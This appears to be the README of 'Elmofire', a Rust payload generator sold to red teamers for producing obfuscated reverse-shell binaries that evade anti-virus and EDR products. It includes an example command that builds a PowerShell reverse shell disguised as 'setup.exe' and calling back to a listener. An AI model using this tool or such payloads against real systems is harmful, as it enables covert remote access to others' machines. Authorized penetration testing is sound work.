<h1>🔥Elmofire🔥</h1>

<h3>Version:</h3>
<ul>0.1.0</ul>

<h3>Description:</h3>
<p>Elmofire has been developed to keep up with the demand of Security Best Practices and Red Team exercises. During an assessment, typically Penetration Testers/Red Team Operators are tasked with bypassing current protections in place within corporate infrastuctures. As most Anti-Virus, likewise Endpoint Detection and Response (EDR) software solutions detect known malware samples based on heuristics and forensic fingerprinting, the goal of Elmofire is to bypass these detections. While not full-proof against every form of EDR on the planet 🌎, Elmofire does an excellent job at generating a randomized and obfuscated payload in an attempt to evade these malware detection services. Currently bypassing all known Anti-Virus solutions on VirusTotal, (Feel free to generate a payload and see for yourself. 😉), the payloads generated by Elmofire are very likely to evade most protection software utilized by organizations throughout the Cyber Security industry.</p>
<h3>Dependencies:</h3>
<ul><code><a href="https://www.rust-lang.org/">rust - version 1.67.0</a></code></ul>
<ul><code><a href="https://github.com/cross-rs/cross">cross - version 0.2.5</a></code></ul>
<ul><code><a href="https://www.docker.com/">docker - version 20.10.12</a></code></ul>
<h4>NOTE:</h4>
<ul>On Linux, Docker runs in the context of the <code>root</code> user by default. To use <code>cross</code>, which uses Docker to compile Rust binaries, it is advised to add your current user to the <code>docker</code> group. E.g. <code>sudo usermod -aG docker user</code> After executing the above command, run <code>newgrp docker</code> in the context of your <code>user</code> or simply logout and log back in.</ul>

<h4>Developed and tested on:</h4>
<ul><code>Pop!_OS 22.04 (Ubuntu)</code></ul>
<ul><code>Kali Linux 2022.4 (Debian)</code></ul>

<h3>Installation:</h3>
<p>After following the instructions to install <code>rust</code>, <code>docker</code>, and <code>cross</code>, you can compile and build Elmofire using the <code>cargo build</code> command from inside the Elmofire source code folder.</p>
<p>E.g.</p>
<p><code>git clone https://github.com/Elmofire/ef</code></p>
<p><code>cd ef/</code></p>
<p><code>cargo build</code></p>
<p>Once successfully compiled without errors, the <code>ef</code> binary file will be located within the <code>target/debug</code> path within the Elmofire source code directory. Feel free to relocate this binary to your most convienent file path configured in your <code>PATH</code> environment, or simply create an <code>alias</code> to point to the current location of the <code>ef</code> binary.</p>
<h3>Usage:</h3>
<pre>🔥ElmoFire🔥 0.1.0
Author: M4x 5yn74x
Description: Yet another obfuscated payload generator written in Rust

USAGE:
./ef -p &lt;OS-Option&gt; -a &lt;Architecture&gt; -l &lt;Listener&gt; -s &lt;Shell-Type&gt; -o &lt;Output filename&gt;

OPTIONS:
    -a &lt;Architecture&gt;        Architecture: x86_64, i586, i686, arm, armv5te, armv7, aarch64, mips,
                             mipsel, mips64, mips64el
    -h, --help               Print help information
    -l &lt;Listener&gt;            Listening host: &lt;listening ip:port&gt;
    -o &lt;Output&gt;              Output filename: &lt;anything goes&gt;
    -p &lt;OS-Option&gt;           Operating System: windows, linux, darwin, ios, android, solaris,
                                    sun-solaris, freebsd, netbsd, illumos
    -s &lt;Shell-Type&gt;          Shell type: cmd, powershell, /bin/bash, /bin/sh, /system/bin/sh,
                                    /bin/busybox, /usr/bin/zsh
    -V, --version            Print version information
</pre>
<p>E.g.</p>
<code>./ef -a x86_64 -l 10.0.0.10:1337 -o setup.exe -p windows -s powershell</code>

<h3>Disclaimer:</h3>
<p>This tool is intended for Penetration Testers, Security Researchers and Red Teamers alike. DO NOT USE this tool for ILLEGAL purposes or WITHOUT the CONSENT from the parties involved while agreed upon by LEGAL DOCUMENTATION or PERMISSIVE ACCESS for security consultation or research purposes. We, hereby relinquish ALL responsiblity for any illegal use of this tool or ANY binary payloads subsequently generated by the tool as discribed. Please use Elmofire responsibly.</p>